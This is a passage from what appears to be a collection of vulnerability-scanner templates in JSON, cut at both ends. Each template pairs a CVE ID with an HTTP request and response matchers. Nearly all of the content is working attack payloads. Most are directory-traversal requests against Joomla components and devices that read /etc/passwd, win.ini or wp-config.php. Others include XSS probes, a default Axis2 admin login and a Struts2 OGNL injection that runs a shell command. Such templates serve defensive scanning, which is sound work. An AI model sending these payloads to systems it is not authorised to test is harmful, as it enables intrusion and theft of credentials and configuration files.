Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Category Grid View Gallery ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Uploader","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory 